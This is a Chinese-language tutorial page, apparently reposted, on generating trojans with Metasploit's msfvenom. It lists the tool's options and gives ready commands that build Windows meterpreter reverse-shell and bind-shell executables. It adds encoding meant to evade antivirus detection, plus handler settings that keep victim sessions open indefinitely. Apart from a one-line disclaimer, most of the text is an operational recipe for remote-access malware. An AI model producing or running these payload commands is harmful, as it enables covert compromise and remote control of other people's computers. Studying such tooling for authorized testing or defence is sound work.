失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > Metasploit -- 生成木马(msfvenom)

Metasploit -- 生成木马(msfvenom)

时间:2022-06-02 08:53:29

相关推荐

Metasploit -- 生成木马(msfvenom)

男孩子都是铁的,你不用考虑他们的感受,他们真的不累,真的,真的不累。。。

---- 网易云热评

作用:生成木马文件

1、msfvenom

相关参数介绍

-p, --payload <payload> 指定需要使用的payload(攻击荷载)

-l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all

-n, --nopsled <length> 为payload预先指定一个NOP滑动长度

-f, --format <format> 指定输出格式 (使用 --listformats 来获取msf支持的输出格式列表)

-e, --encoder [encoder] 指定需要使用的encoder(编码器)

-a, --arch <architecture> 指定payload的目标架构

--platform <platform> 指定payload的目标平台

-s, --space <length> 设定有效攻击荷载的最大长度

-b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;

-i, --iterations <count> 指定payload的编码次数

-c, --add-code <path> 指定一个附加的win32 shellcode文件

-x, --template <path> 指定一个自定义的可执行文件作为模板

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

--payload-options 列举payload的标准选项

-o, --out <path> 保存payload

-v, --var-name <name> 指定一个自定义的变量,以确定输出格式

--shellest 最小化生成payload

-h, --help 查看帮助选项

--help-formats 查看msf支持的输出格式列表

2、以windows为例

基础命令格式

windows:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=8787 -f exe > shell.exe

加上编码(达到免杀效果)

msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3LHOST=192.168.139.131 LPORT=4444 -f exe > 1.exe

3、连接生成的木马

选择攻击模块(exploit/multi/handler)

设置payload和上面的一样

4、目标主机运行木马

注意:

msf exploit(multi/handler) > set ExitOnSession false

//可以在接收到seesion后继续监听端口,保持侦听。

防止session意外退出

msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0

//默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0

msf5 exploit(multi/handler) > set SessionExpirationTimeout 0

//默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

如果觉得《Metasploit -- 生成木马(msfvenom)》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。